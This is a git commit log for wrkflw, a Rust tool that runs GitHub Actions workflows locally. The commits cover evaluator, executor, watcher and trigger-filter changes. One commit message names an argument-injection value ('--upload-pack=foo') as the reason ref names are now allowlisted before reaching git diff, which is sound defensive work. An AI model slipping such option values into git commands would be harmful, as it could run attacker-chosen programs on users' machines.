bahdotsh	295b309517	ci: silence new clippy::collapsible_match in TUI event loop Clippy on main has been failing since the runner picked up Rust 1.95. The collapsible_match lint got stricter and now complains about every match arm whose body is just `if cond { ... }` — twelve of those live inside run_tui_event_loop's big `match KeyCode`. The "fix" clippy suggests is match guards: `KeyCode::Char(' ') if cond => { ... }`. Tempting, but wrong. That same match ends with a `KeyCode::Char(c)` catch-all that pipes keys into log search. Convert the earlier arms to guarded patterns and every time a guard fails — space pressed outside tab 0, 'a' while running, etc. — the key falls through into the log-search input handler. That's a behavior change dressed up as a refactor, and not one I want landing under a CI fix. So just slap `#[allow(clippy::collapsible_match)]` on the function and move on. Matches the existing convention in engine.rs for other function-scoped lint allows. If someone later wants to actually restructure that match, they can do it as its own change with its own testing.	2026-04-18 19:18:15 +05:30
Gokul	09903569eb	feat(evaluator): make toJSON(needs) return nested needs object (#98 ) * feat(evaluator): make toJSON(needs) return nested needs object Same bug that toJSON(steps) had before #97, and toJSON(env) had before #96: resolve() had no match arm for the bare "needs" identifier, so it fell through to Null. Anyone trying to dump the cross-job outputs context got "null" back. Useful. Build the shape GHA actually provides: each job ID maps to an object with "outputs" (sub-object) and "result". Merge the key sets of needs_context and needs_results so a job appears even if only one of the two has recorded something for it — same union-of-keys trick as the steps arm. Omit "result" when no result was recorded, mirroring how steps omits outcome/conclusion in that case. The only real shape difference vs. steps is the single "result" string instead of the (outcome, conclusion) pair. Tests mirror the toJSON(steps) suite: populated context, empty, sorted keys, one-sided populations, and special-character escaping. Also drops "needs" from the lingering TODO comment — github, secrets, matrix still to go. * chore(secrets): silence clippy::unnecessary_sort_by in masker Clippy 1.95 decided that `sort_by(\|a, b\| b.0.len().cmp(&a.0.len()))` is an unnecessary dance when `sort_by_key` with `Reverse` says the same thing in fewer tokens. CI is now `-D warnings`, so this was the difference between a green build and a red one. Swap to `sort_by_key(\|pair\| std::cmp::Reverse(pair.0.len()))`. Same descending-by-length order, same behavior, clippy goes quiet. Not a change anyone will miss.	2026-04-18 19:03:41 +05:30
Gokul	dcf0696de7	feat(evaluator): make toJSON(steps) return nested steps object (#97 ) * feat(evaluator): make toJSON(steps) return nested steps object toJSON(steps) has been returning null this whole time, which is not particularly useful when you're trying to debug a multi-step workflow and want to dump the full steps context. The resolve() method had no match arm for bare "steps" — it just fell through to the catch-all Null. Meanwhile, all the infrastructure for nested objects (ExprValue::Object, recursive expr_to_json, sorted pretty-print) was already sitting right there from the env implementation. Build the nested structure that GHA provides: each step ID maps to an object with "outputs" (sub-object), "outcome", and "conclusion". Union keys from both step_outputs and step_statuses so we don't silently drop data if a step appears in only one map. Seven new tests cover the happy path, empty context, sorted keys, status-without-outputs, outputs-without-status, truthiness, and special characters. * style(evaluator): import HashSet at top of expression.rs Move inline std::collections::HashSet usage to a top-level import for consistency with HashMap. Apply rustfmt.	2026-04-16 16:12:23 +05:30
Gokul	100ff53167	fix(evaluator): make toJSON(env) return env object instead of null (#96 ) * fix(evaluator): make toJSON(env) return env object instead of null It turns out that `toJSON(env)` has been returning the string "null" this whole time. The reason is straightforward: `ExprValue` had no concept of an object — only strings, numbers, booleans, and null. When the evaluator saw bare `env` (no dot, no property), it fell through every match arm and landed on the catch-all `Null`. Then toJSON happily serialized that to "null". Add an `Object(HashMap<String, ExprValue>)` variant to `ExprValue`. When `resolve()` encounters bare `env`, it now builds an Object from env_context, filtering out system-injected keys (GITHUB_, RUNNER_, INPUT_, WRKFLW_, CI). The toJSON function serializes Object values as sorted, pretty-printed JSON to match real GitHub Actions behavior. * fix(evaluator): clean up toJSON(env) Object variant plumbing The previous commit added ExprValue::Object and wired it into resolve() for bare `env` context. It worked, but it had a few things that were not great. The inline env-var filter (six separate prefix/name checks) was duplicated knowledge about which vars the executor injects, buried inside resolve() where nobody would think to update it when a new internal prefix is added. Extract it into is_user_env_var() so there's exactly one place to maintain. The Vec of entries was sorted by key and then collected into a HashMap, which — in case anyone needs reminding — does not preserve insertion order. The sort was pure theatre. Remove it; toJSON already re-sorts via BTreeMap when serializing. While at it, add a test for the empty-env edge case (all vars are internal) to make sure we get "{}" and not something surprising. * fix(evaluator): use proper JSON serialization for toJSON(env) objects The toJSON() serializer for Object values was using to_output_string() to convert values before feeding them to serde_json. That works fine today because all env values happen to be strings, but it means nested objects would serialize as the hilariously unhelpful "[object Object]" instead of actual JSON. Switch to a proper expr_to_json() converter that maps ExprValue to serde_json::Value recursively, so nested objects actually survive serialization. While at it, stop fully-qualifying HashMap when it's already imported — that's just noise. Add a test for the completely-empty env context edge case, because apparently nobody thought to check what happens when there are literally zero environment variables. * docs(evaluator): document is_user_env_var heuristic limitations The is_user_env_var filter uses prefix matching to separate user-declared env vars from runner-injected ones, but env_context is a single flat HashMap that mixes both. This means a user who writes `env: { GITHUB_CUSTOM: "val" }` gets silently excluded from toJSON(env) output. This is not great, but the proper fix — separating user env from runner env upstream in ExpressionContext — is a larger refactor. For now, document the limitation so nobody has to rediscover it the hard way, add a test that pins the current (incorrect) behavior, and drop a TODO for the other bare contexts (github, secrets, matrix, steps, needs) that still return null under toJSON(). * fix(evaluator): harden Object variant and is_user_env_var heuristic The is_user_env_var heuristic was living in blissful isolation from the code that actually injects the internal env vars. If someone added a new prefix in create_github_context without updating the filter, internal vars would silently leak into toJSON(env) output and nobody would know until a user complained. Add a cross-module test that constructs the full github context and asserts every single key is filtered by is_user_env_var. If the two get out of sync, the test will scream. Make is_user_env_var pub(crate) so the environment module can reach it. While at it, add an explicit Object arm to expr_cmp instead of relying on the catch-all — because "it happens to work" is not the same as "it's correct." Also call out GITHUB_TOKEN in the doc comment since that's the most likely real-world victim of the heuristic. Add tests for fromJSON/toJSON round-trip, special characters in env values, and Object ordering comparisons. * fix(evaluator): fix Object string coercion and tidy up review issues to_output_string() for ExprValue::Object was returning "[object Object]", which is what JavaScript does but not what GitHub Actions does. GHA coerces objects to their JSON representation in string contexts (e.g. ${{ env }}), so returning a JS-ism here would silently produce garbage output for anyone relying on string interpolation of context objects. While at it, document the MATRIX_CONTEXT exclusion in is_user_env_var so nobody has to go hunting for where it's inserted (it's add_matrix_context() in environment.rs), and rename the misleadingly named "roundtrip" test to what it actually tests — that fromJSON(toJSON(env)) produces parseable JSON, not that it does a true semantic roundtrip.	2026-04-14 16:08:34 +05:30
Gokul	530a709652	fix(executor): populate workflow-level env in expression context (#95 ) * fix(executor): populate workflow-level env in expression context It turns out that `WorkflowDefinition` simply didn't have an `env` field. Serde was silently discarding the workflow-level `env:` block during YAML deserialization, so `${{ env.GLOBAL_VAR }}` evaluated to empty string while `$GLOBAL_VAR` in shell commands worked fine — because the OS environment got the vars, but the expression evaluator never did. Job-level and step-level env worked correctly because the `Job` and `Step` structs both had their `env: HashMap<String, String>` fields. The workflow-level struct just... didn't. For absolutely no reason. Add the missing `env` field to `WorkflowDefinition` and merge it into `env_context` right after `create_github_context()`, before job-level env is applied. This gives correct precedence: step > job > workflow, matching GitHub Actions behavior. * fix(executor): harden workflow-level env precedence and add expression resolution The previous commit added workflow-level env to the expression context, but it used insert() which means a workflow that defines env: { CI: "false" } would override the built-in GITHUB_*/CI variables from create_github_context(). That is not great. Real GitHub Actions never lets workflow env stomp on runner-provided builtins. Switch to entry().or_insert() so workflow env only fills in keys that aren't already set. While at it, workflow-level env values containing ${{ }} expressions (e.g. ${{ github.repository }}) were being inserted raw without resolution. Job and step env both resolve expressions — workflow env should too. Add the same preprocess_expressions() pass. Add three tests covering: builtin var protection, workflow-vs-job precedence, and expression substitution in workflow env values.	2026-04-14 10:11:10 +05:30
Gokul	b711e871f7	fix(executor): propagate composite action outputs back to caller (#94 ) * fix(executor): propagate composite action outputs back to caller It turns out that execute_composite_action() was happily running all the internal steps of a composite action, correctly tracking their outputs in composite_step_outputs, and then... just throwing all of that away. The action.yml `outputs:` section — the whole reason composite actions have a return path — was never read or evaluated. So ${{ steps.my-composite.outputs.whatever }} always resolved to empty string. Inputs worked fine. The internal steps ran fine. The output values were right there in memory. Nobody bothered to connect the last wire. Add propagate_composite_outputs() which reads the action's outputs section after the step loop, evaluates each value expression against the composite's internal step context, and writes the results to the caller's GITHUB_OUTPUT file. The existing apply_step_environment_updates pipeline then picks them up naturally — no changes to StepResult or process_outcome needed. Also wire this into the early-return failure path so partial outputs are still available when a composite step fails. * fix(executor): pass actual job status to composite output propagation The previous commit (`1119f63`) added propagate_composite_outputs() to resolve composite action outputs and write them to the caller's GITHUB_OUTPUT file. Good fix, but it hardcoded job_status to "success" in the ExpressionContext. It turns out that when a composite step fails, record_step_status has already flipped composite_job_status to "failure" — but the output propagation on the failure short-circuit path was still cheerfully telling the expression evaluator everything was fine. Any output expression using success() or failure() builtins would evaluate with the wrong answer. Pass the actual composite_job_status to propagate_composite_outputs instead of lying about it. While at it, add tests for the failure path (partial outputs from steps that ran before the failure) and for referencing steps that never existed (should resolve to empty, not panic). * fix(executor): handle multiline values in composite output propagation It turns out that propagate_composite_outputs was writing all values using simple key=value format, which silently corrupts the GITHUB_OUTPUT file when a resolved expression contains newlines. The second line onward becomes unparseable garbage, and downstream steps quietly get empty outputs. This is not great, especially since parse_github_kv_file already supports the heredoc format (key<<EOF\nvalue\nEOF) on the read side. The writer just never bothered to emit it. Switch to heredoc format when the value contains '\n', and log a debug diagnostic when the GITHUB_OUTPUT file can't be opened instead of silently swallowing the error. Add a round-trip test that verifies multiline values survive the write-then-parse cycle. * fix(executor): use unique heredoc delimiter and handle write errors in composite output propagation The heredoc format for multiline composite outputs was using a hardcoded "EOF" delimiter. If an output value happened to contain a line that was literally "EOF", parse_github_kv_file would prematurely terminate the heredoc and silently truncate the value. This is not great. On top of that, every write!() call was discarding its Result with `let _ = ...`, so a partial I/O failure would produce a corrupt GITHUB_OUTPUT file that the caller would happily misparse. Replace the hardcoded delimiter with generate_heredoc_delimiter(), which starts with "ghadelimiter" and appends _1, _2, etc. until it finds one that doesn't collide with any line in the value. This matches what real GitHub Actions does (they use UUIDs, but the principle is the same). Chain the writes with and_then() so the first failure logs a debug message and breaks out of the loop. While at it, add tests for delimiter collision and the delimiter generator itself. * .gitignore	2026-04-13 15:06:43 +05:30
Gokul	a668d815c4	fix: artifact actions under --runtime emulation (#93 ) * test(executor): cover run-step → upload/download-artifact handoff under emulation Drive a real EmulationRuntime through execute_step for three steps (run, upload-artifact, download-artifact) and assert the payload round-trips byte-for-byte. Reproduces #88: today the run step writes via the GITHUB_WORKSPACE reroute while upload reads ctx.working_dir, so the two workspaces diverge and the upload fails with "No files found matching pattern". Test is intentionally failing at this commit; the fix follows. * runtime(container): add resolve_host_working_dir helper Introduces a pure function that rebases a container-visible working directory onto its host-side volume source by finding the longest component-boundary prefix in the volumes list and grafting the suffix. This is the building block for making non-container runtimes (emulation, secure_emulation) honor the same mount semantics as docker, so a run: step and an artifact handler observe the same host workspace (fix for #88). The helper itself is pure and pub(crate); wiring follows in the next commit. Component-boundary matching (via Path::strip_prefix) ensures /github/workspace-foo is not matched by a /github/workspace mount. * fix(runtime): emulation honors volume mounts for working dir (#88) EmulationRuntime::run_container now rebases a container-visible working directory onto its host-side volume source via resolve_host_working_dir, matching the mount semantics docker already provides. The old GITHUB_WORKSPACE / CI_PROJECT_DIR reroute is gone: the volumes parameter is authoritative, and calling with a container path that no volume covers is now a hard error instead of a silent substitution. This makes `run:` steps and artifact/cache handlers observe the same host workspace, fixing the reported symptom where upload-artifact returned "No files found matching pattern" because the run step had written through the reroute to the real project directory while the upload was searching the per-job tempdir. Also adjust the #88 regression test to use a glob pattern compatible with the `glob` crate's handling of trailing `*` (which matches zero components in that position). The pattern quirk is orthogonal to #88; tracking fixing artifact glob semantics separately. fix(runtime): secure_emulation honors volume mounts; sandbox runs in-place (#88) Brings SecureEmulationRuntime and the Sandbox under the same mount contract as EmulationRuntime and docker: a container-visible working dir is rebased via `resolve_host_working_dir` onto its host-side volume source, and the command is executed directly in that host path. The Sandbox used to copy files into its own private workspace and run there, so nothing the caller's `run:` step wrote was visible to any subsequent artifact/cache handler — the same #88 symptom that hit plain emulation, just via a different mechanism. The copy dance was also not a meaningful security layer; validation comes from `validate_command` (command whitelist, dangerous patterns) and `is_env_var_safe` (env filtering), which still run. Removed: Sandbox::setup_sandbox_environment, copy_safe_files, is_path_allowed, should_skip_file, should_skip_directory, and the `workspace: TempDir` field. Removed the file-filtering test that covered only the deleted copy path. Added two targeted tests for the new rebase behavior and the error-when-no-volume-covers path. Uncovered container working dirs now fail loudly with "not covered by any volume mount" instead of silently running in an incorrect location. * refactor(runtime): centralize rebase helper and tighten semantics PR #93 landed the #88 fix, but review pointed out three things I'd missed, and they're the kind that turn into the next bug report if you leave them alone. First: both EmulationRuntime and SecureEmulationRuntime did `if working_dir.exists() { use it } else { rebase via volumes }`. That's the wrong way around. If a dev happens to have a real `/github/workspace` directory on their host — containerized dev env, weird NFS mount, somebody being creative — the short-circuit silently skips the rebase and we're right back to two workspaces disagreeing about where files live. The whole point of the #88 fix is that the volume mapping is authoritative. Flipping the branch order makes it actually authoritative: the volume wins first, and we only fall back to \`working_dir\` as-is when no volume claims it. Second: ~50 lines of near-identical rebase + create_dir_all + log + error boilerplate sat duplicated in two runtimes. The next fix would get applied to one file and not the other. Extracted into a single \`rebase_working_dir_or_error\` helper in container.rs. Both call sites collapse to one line. Third: SandboxConfig was still carrying \`allowed_read_paths\` and \`allowed_write_paths\` fields that nothing reads. The old \`is_path_allowed\` that used to check them is gone. Leaving dead fields on a type named \`Sandbox\` is worse than removing them — a reader a year from now will assume they're enforced and ship something based on that assumption. Please don't do that. Deleted them, along with the factory code that was still populating them for no reason. While at it: documented the \`>=\` tiebreaker in \`resolve_host_working_dir\` (equal-depth ties only happen on duplicate volume entries, so first-wins is deliberate, not a typo), added the matching emulation error test for symmetry with secure_emulation, added four new unit tests for the helper, and put a module-level doc comment on SandboxConfig explaining what the sandbox actually enforces (command validation, not filesystem isolation). 19/19 runtime tests (up from 14), 333/333 executor tests including the #88 regression, workspace clippy clean. * fix(test): skip emulation artifact roundtrip test on Windows The artifact roundtrip test runs `bash -c "mkdir ... && echo ..."` through EmulationRuntime, which does `Command::new("bash")`. On Windows CI runners, this resolves to WSL's `bash.exe` sitting in `C:\Windows\System32\`, not Git Bash. And since the runner has no WSL distributions installed, the test blows up with a helpful "Windows Subsystem for Linux has no installed distributions" and a link to the Microsoft Store. The test is inherently Unix-only — it exercises Unix shell commands on a real EmulationRuntime. Gate it with `cfg(not(target_os = "windows"))`. * fix(test): skip secure_emulation rebase test on Windows Same story as `024a300` — the test runs `pwd` via `sh -c` and then tries to `canonicalize()` the output. On Windows, `sh` (from MSYS2) prints a Unix-style path that `std::path::PathBuf::canonicalize()` has absolutely no idea what to do with. The rebase logic itself is tested by the pure path-math tests in container.rs which work fine everywhere. This test is specifically about the end-to-end sandbox execution path, and that requires a real Unix `sh`. Skip it on Windows.	2026-04-13 10:51:38 +05:30
Gokul	f4e9f84fc4	refactor(watcher,wrkflw): finish draining god-files into modules (#92 ) * refactor(watcher,wrkflw): finish draining god-files into modules The last round of extractions (event_kind, ignore, paths, setup, trigger_cache, debouncer, shutdown) already peeled the leaves off `watcher.rs`, but the orchestration core — the 430-line `run()` body, the git-state cache, the per-cycle `evaluate_and_execute` — was still sitting there, interleaved with the struct definitions and hiding under 2071 lines of mostly-test file. `main.rs` had the same problem on the CLI side: the `Run` and `Watch` match arms were long inline blocks, and the `pull_request + no base-branch` rejection was literally copy-pasted between the run arm's `apply_base_branch` helper and the watch arm's inline block. Having the same load-bearing error string in two places is not my idea of redundancy. Lift the TTL-bounded git-state cache into a new `git_state.rs` as a proper `GitStateCache` type. The `Mutex<Option<CachedGitState>>` field on `WorkflowWatcher` was a hint that this wanted its own home. Move the whole main loop body into a new `reactor.rs`, and while at it drag `evaluate_and_execute`, `refresh_trigger_cache_async` and `canonicalize_changed_paths` with it — they're private, nobody outside the reactor calls them, and leaving them on `WorkflowWatcher` was just more clutter. Keep a `#[cfg(test)]` shim for `cached_git_state` because two tests pin staleness behavior through the method; changing the tests would have been scope creep. On the `wrkflw` side, extract `prefilter.rs` (holds `PrefilterDecision`, `PrefilterRequest`, `run_trigger_prefilter`, `build_event_context`, `apply_base_branch`, `effective_strict_filter`, plus the seven prefilter unit tests), then `run_workflow_cmd.rs` and `watch_cmd.rs` for the two command bodies. Collapse the duplicated pull_request rejection into a new shared `validate_event_requires_base_branch` helper so both hosts render identical diagnostics. That's the whole reason the prefilter pattern exists — to put the flag-matrix logic in one testable place — and letting the watch command keep its own copy was how we got here in the first place. While at it, fix a silent-skip hole at the top of the reactor loop. The workflow-rescan failure at the old `watcher.rs:628-637` was logged at `debug` level, directly under a comment that called the fallback "the exact silent-skip pattern the rest of this PR has been plugging." Someone saw the hazard and then muted it. Bump it to `warning` so a persistently-failing rescan (chmod 000, flaking NFS mount, missing parent) actually surfaces to the user instead of leaving them staring at a session-long "0 triggered" stream. Non-verbose users would otherwise never know their new workflow file was being ignored. Numbers: `watcher.rs` 2071 → 1218 (~300 non-test), `main.rs` 2039 → 937. New files: `git_state.rs` (171), `reactor.rs` (819), `prefilter.rs` (814), `run_workflow_cmd.rs` (221), `watch_cmd.rs` (248). Public API unchanged. All 46 watcher tests + 7 prefilter tests still pass. \`cargo clippy -D warnings\` and \`cargo fmt --check\` are both clean. * fix(watcher,wrkflw): address review findings on god-file drain Three things from the review on the refactor PR, none of them structural but all three worth fixing before merge. First, the unified `validate_event_requires_base_branch` helper had hardcoded "simulating" in both the strict error and the non-strict warning. Reads fine from `wrkflw run` — the run command is simulating — but `wrkflw watch` is not simulating anything, it's watching. The old inline watch-arm check used "Watching pull_request" for a reason, and collapsing both sites onto a run-flavored literal was a UX regression for watch users. The PR body also claimed the two sites were "literally copy-pasted"; they were similar but not textually identical. Reword the helper host-neutral ("event `pull_request` without --base-branch..."), drop the "simulating"/"watching" verbs entirely, and pin it with three new tests: the non-PR passthrough pair, the `pull_request_target` strict-mode rejection, and a regression pin that fails the build if either host-specific verb ever sneaks back in. Second, the escalation of the per-cycle rescan-failure log from `debug` to `warning` was the right direction — `debug` was invisible to non-verbose users staring at a session-long "0 triggered" stream — but the same function wires up `supervisor_warned_at_threshold` as a one-shot latch right above the rescan code, and the rescan branch was left unlatched. Under `chmod 000 .github/workflows` plus active file churn the new warning would fire on every debounced cycle for the rest of the session, which is the diagnostic-flood failure mode on the other side of the silent-skip hole. Same pattern as the supervisor: warn once per failing spell, reset the latch on the first healthy rescan, log a matching info line on recovery so the operator sees the transition. Third, `SUPERVISOR_WARN_THRESHOLD` and `SUPERVISOR_HARD_CAP` were declared `pub(crate)` on `watcher.rs` but read only from `reactor.rs`. Move them next to the loop that enforces them, drag the compile-time `const _: () = { assert!(...) }` invariant block along, and leave a breadcrumb in `watcher.rs` so `git blame` doesn't have to chase it. 46/46 watcher tests pass, prefilter tests go 7 → 10, clippy and fmt both clean.	2026-04-12 00:14:42 +05:30
Gokul	154df50968	feat: add diff-aware selective execution and watch mode (#91 ) * feat: add diff-aware selective execution and watch mode Add two new crates and CLI capabilities that differentiate wrkflw from act: - `wrkflw-trigger-filter`: Parses workflow `on:` trigger configs (paths, branches, tags filters) and evaluates them against git diff state to determine which workflows would actually trigger. - `wrkflw-watcher`: File system watcher using `notify` crate with debouncing that auto-detects changes and re-runs affected workflows. CLI additions: - `wrkflw run --diff` uses git diff for trigger-aware execution - `wrkflw run --event <type>` simulates a specific event type - `wrkflw run --changed-files <list>` manually specifies changed files - `wrkflw watch` monitors for changes and runs matching workflows TUI additions: - Press `d` to toggle diff-aware trigger filter overlay - Shows green/gray indicators for which workflows would trigger - Status bar reflects diff filter state * fix(trigger-filter,watcher): correct glob semantics and fix watcher polling The glob matchers in both path_matcher and ref_matcher were using require_literal_separator: false, which means * happily matches / in file paths and ref names. That's not how GitHub Actions works — * matches anything except /, and ** is what crosses directory boundaries. So src/* would incorrectly match src/sub/file.rs. The test that was supposed to catch this (star_does_not_match_slash) actually tested src/*/.rs instead. Sneaky. Set require_literal_separator: true in both matchers and fix the test to actually assert the correct behavior. While at it, fix two issues in the watcher's Debouncer: The mutex handling was inconsistent — add_event and has_pending silently swallowed poison, but drain called unwrap() and would panic. Extract a lock_or_recover() helper that consistently recovers from poison via into_inner() everywhere. The main watch loop was busy-polling with a 100ms sleep, which is wasteful and adds needless latency. Replace it with a tokio::sync::Notify that fires when add_event inserts a path, so the loop blocks properly until there's actual work to do. * fix(trigger-filter): correct filter bypass and evaluate activity types It turns out that when the event context had no branch (e.g., a tag push), the branch filter check was simply skipped, meaning a workflow with `branches: [main]` would happily match a tag push. Same problem with the tag filter. The `if let Some(ref branch)` guard meant "no branch = pass the filter", which is the exact opposite of what GitHub Actions does. The fix inverts the logic: check whether the filter requires branches/tags first, and if the context doesn't have one, fail immediately. While at it, the `types` field was being dutifully parsed from YAML into `EventFilter.types` and then completely ignored during evaluation. A workflow with `pull_request: { types: [opened] }` would trigger on every PR event regardless. That's not great. Add `activity_type` to `EventContext` and actually evaluate it. Also fix the TUI's `toggle_diff_filter` which was running synchronous git subprocesses on the render thread — blocking the entire UI while `git diff` thinks about its life choices. Move the heavy lifting to `std::thread::spawn`. And replace an O(n²) `Vec::contains` dedup in `get_changed_files` with a HashSet. * fix(trigger-filter,watcher,ui): fix TUI blocking, watcher event loss, and dual filtering Three issues found during review, all stemming from the diff-aware execution feature introduced in the previous commits. The TUI's toggle_diff_filter() was calling thread::spawn().join(), which blocks the main event loop thread while git commands and workflow parsing run. If git is slow (large repo, broken index, network mount), the entire TUI freezes with no way out. Convert to a fire-and-forget thread with an mpsc channel — the background thread sends results, and check_diff_filter_results() polls on each tick via try_recv(). No blocking, no freezing. The watcher's main loop had a subtle event loss bug. After notify.notified().await returns and a (potentially long) workflow execution completes, any events that accumulated during execution sit in the debouncer. But the loop goes back to notified().await, which blocks until the next filesystem event — the accumulated ones are orphaned. Add a has_pending() check before awaiting so we process the backlog immediately. The executor had an event_filter field on ExecutionConfig, giving it trigger evaluation responsibilities that don't belong there. The watcher already filters externally (correctly), creating two divergent code paths for the same concern. Remove event_filter from ExecutionConfig entirely and move trigger evaluation to the call site in main.rs, where it belongs. The executor should just execute. * fix(trigger-filter,watcher,ui): eliminate duplicated git logic, fix missing untracked files, and parallelize watcher It turns out the TUI's evaluate_diff_filter was hand-rolling its own git commands via std::process::Command instead of reusing the async helpers in trigger-filter::git. Worse, it was only running `git diff --name-only HEAD` and not including untracked files via `git ls-files --others`. So newly added files were silently invisible to the TUI diff filter. Not great. Add synchronous wrappers (get_changed_files_sync, get_current_branch_sync, get_current_tag_sync) to trigger-filter::git, sharing the parsing logic with the async versions via extracted helpers. The TUI now calls these instead of maintaining its own parallel universe of git invocations. While at it, fix three more things: - The watcher was executing triggered workflows sequentially, meaning a slow workflow would block all others and starve event processing. Switch to futures::future::join_all for concurrent execution. - The debouncer's drain() was unconditionally sleeping for the full debounce duration even when nothing was pending. Now it returns immediately when empty and re-checks for new arrivals after each sleep window so event bursts settle properly. - The eval reason messages were useless when filters failed due to missing context (no branch, no tag, no activity type). They now say why the filter couldn't match instead of just dumping the pattern list. * fix(watcher,trigger-filter,ui): fix watcher stalls, unbounded concurrency, and sync API duplication The watcher had a few problems that would make it miserable to use on any real-world repository. First, the notify callback was using blocking_send() on the mpsc channel, which means when the channel fills up (256 slots), the OS filesystem event thread blocks. That's the kind of thing that makes your entire watcher stop receiving events. Switched to try_send() — dropping a duplicate event is fine since the debouncer coalesces anyway. Second, the watcher was recursively watching the entire repo root with no exclusions beyond .git/. On any project with a target/ or node_modules/ directory, this floods the event channel with thousands of irrelevant build artifact changes. Added a DEFAULT_IGNORE_DIRS list that filters at the path-component level. Third, join_all() on the triggered workflow futures meant unbounded concurrent execution. If 20 workflows trigger simultaneously, that's 20 Docker containers spawning at once. Replaced with buffer_unordered(4) so we don't eat all available resources. While at it, a few more cleanups from the review: - Renamed the misleading on_event callback to on_cycle_complete, since it fires after execution completes, not on detection. - Extracted the 170-line evaluate-and-execute loop from run() into its own evaluate_and_execute() method. - Parallelized the two sequential git subprocess calls in get_changed_files() with tokio::join!. - Killed the entire sync API in git.rs (three copy-pasted functions). The TUI's evaluate_diff_filter now spins up a lightweight current_thread tokio runtime instead of maintaining duplicate sync wrappers. Having the same logic in two places with two slightly different implementations is not redundancy, it's a bug farm. - Renamed LogFilterLevel::to_string() to as_str() because shadowing the ToString trait with an inherent method is a Clippy lint and genuinely confusing. * fix(trigger-filter,watcher,ui): fix debouncer livelock, dead code, and broken diff base Three issues found during review, all interconnected: The debouncer's drain() loop had no upper bound on settle rounds. If filesystem events arrived faster than the debounce window (e.g. a large build writing hundreds of files), it would spin forever comparing pending.len() != count_before. Add a MAX_SETTLE_ROUNDS cap of 10 so it eventually gives up waiting for silence and just drains what it has. The trigger-filter crate exported filter_workflows() and auto_detect_context() — nice reusable helpers — and then both state.rs and watcher.rs proceeded to ignore them entirely and inline their own copies of the same logic. Three copies of "build EventContext, loop over workflows, evaluate triggers" is not redundancy, it's a maintenance trap. Refactor both callsites to actually use the helpers they're sitting next to. The TUI diff filter was hardcoded to diff against HEAD, which only shows uncommitted changes. Post-commit, the diff is empty and every workflow gets filtered out. Add get_default_diff_base() which checks for uncommitted changes first (uses HEAD), then falls back to merge-base with main/master, then HEAD~1. The TUI now uses this via auto_detect_context so it shows meaningful results even after committing. While at it, cargo fmt touched eval.rs formatting. No logic change. * fix(trigger-filter): fix staged file blindness, hardcoded default branch, and dead code get_changed_files() was running `git diff --name-only HEAD` and proudly calling that "staged + unstaged changes." It turns out that command only shows unstaged changes. Files sitting in the index after `git add` were completely invisible to trigger evaluation. Confusion ensues. Add a parallel `git diff --cached --name-only <base>` call and merge its results with the unstaged diff, deduplicating paths. Now we actually see what the user staged. Novel concept. get_default_diff_base() had "main" and "master" hardcoded as the only candidates for the merge-base. Repos using "develop", "trunk", or literally anything else would silently fall back to HEAD~1, which is almost certainly wrong. Query `git symbolic-ref refs/remotes/origin/HEAD` first to detect the actual default branch, then fall back to the hardcoded list. While at it, remove the dead PatternError variant from TriggerFilterError — it was never constructed anywhere. * fix(trigger-filter,watcher,ui): consolidate EventContext, fix fallback crash, and harden watch loop Three call sites — CLI run, TUI toggle, and the watcher — were each hand-assembling EventContext with subtly different logic. The CLI forgot to use auto_detect_context, the watcher skipped untracked files, and the TUI was the only one doing it right. It was only a matter of time before these diverged further. Add context_from_diff_range() and context_from_changed_files() to trigger-filter and use them everywhere. One place to get it right, zero places to get it wrong. The get_default_diff_base() fallback was blindly returning "HEAD~1" which explodes on single-commit repos because there is no parent. Now we verify HEAD~1 resolves first and fall back to the git empty tree SHA (4b825dc6...) as the ultimate backstop — which means "all files are changed" rather than "crash and burn." While at it: - Wrap on_cycle_complete in spawn_blocking so a blocking callback can't stall the entire watch loop - Re-collect workflow files each cycle so newly added .yml files get picked up without a restart - Guard rapid 'd' toggle in the TUI against spawning duplicate background threads by dropping the in-flight receiver first - Add 15 new tests covering filter_workflows, should_ignore_path, debouncer livelock prevention, invalid globs, and parser types * fix(watcher,wrkflw,ui): make watch concurrency configurable and warn on lone --event Three small things from a code review that were bugging me. First: the watcher had MAX_CONCURRENT_EXECUTIONS hardcoded to 4. Fine for a typical .github/workflows directory, terrible for anyone with 30 workflows who actually wants them to run. Promote it to DEFAULT_MAX_CONCURRENT_EXECUTIONS, plumb a max_concurrency parameter through WorkflowWatcher::new, and expose it as --max-concurrency on the watch command. Clamp to >= 1 because passing 0 to buffer_unordered would just deadlock, and "deadlock on user input" is not the user experience I want to ship. Second: `wrkflw run --event push` (without --diff or --changed-files) silently builds an EventContext with zero changed files. Any workflow with a `paths:` filter then "doesn't trigger" and the user has no idea why. Log a warning explaining exactly what happened and what to do about it. Not a fix per se — the behavior is technically correct — but silent surprise is worse than a loud warning. While at it: add a comment on the `_watcher` binding in the watch loop because RecommendedWatcher stops emitting events the moment it gets dropped, and that's the kind of footgun future-me will absolutely step on. Also flatten a pointless nested if/else in status_bar.rs that clippy would have eventually complained about anyway. * fix(trigger-filter,watcher,ui): stop lying about which workflows would run The diff-aware execution feature had a pile of quiet ways to mislead the user, which is the worst kind of bug in a tool whose entire purpose is "tell me what would run." First, invalid glob patterns were silently swallowed. A typo like `paths: [src/*.rs]` matched nothing and there was no diagnostic — the workflow just reported "would not trigger" and everyone assumed it was correct. Compile globs up front in parse_trigger_config and surface bad patterns as ParseError pointing at the exact key (e.g. `push.paths`). Pre-compiling also means we're not re-running Pattern::new on every hot path. Second, the \`pull_request: branches:\` filter was matched against the current working branch. GitHub Actions matches it against the base* (target) branch, so any workflow guarded by \`pull_request: branches: [main]\` was reported as "would not trigger" when evaluated on a feature branch. That's the exact opposite of what happens on GitHub. Add base_branch to EventContext, route it through branch_for_filter(), expose a --base-branch flag on both \`run\` and \`watch\`, and warn loudly when the user simulates pull_request without it. Third — and this is the fun one — the TUI's diff filter zipped background-thread results positionally against self.workflows. The background thread captured workflow_paths at toggle time and sent back a Vec. If the workflow list reloaded between toggle and result delivery (a new .yml appears on disk, which is exactly what a file-watcher app does), the positional zip assigned statuses to the wrong workflows. Send (PathBuf, status) pairs through the channel and key them by path on receipt. While at it: - should_ignore_path matched any component anywhere in the path against the blacklist, so a file literally named \`scripts/target\` or \`docs/build\` was silently dropped. Repo-root-relative + skip-the-leaf fixes it. - All git commands take an optional cwd and prepend \`git -C <root>\`, so the watcher queries the repo it's actually watching instead of whatever the process CWD happens to be. - Ref names are validated against an allowlist before being passed to \`git diff\`, so \`--upload-pack=foo\` and friends can't sneak in through --diff-base. - For non-HEAD base, the redundant \`git diff --cached <ref>\` was doing nothing useful — \`git diff <ref>\` already covers staged + unstaged. Dropped. - Workflow files are cached in the watcher and only 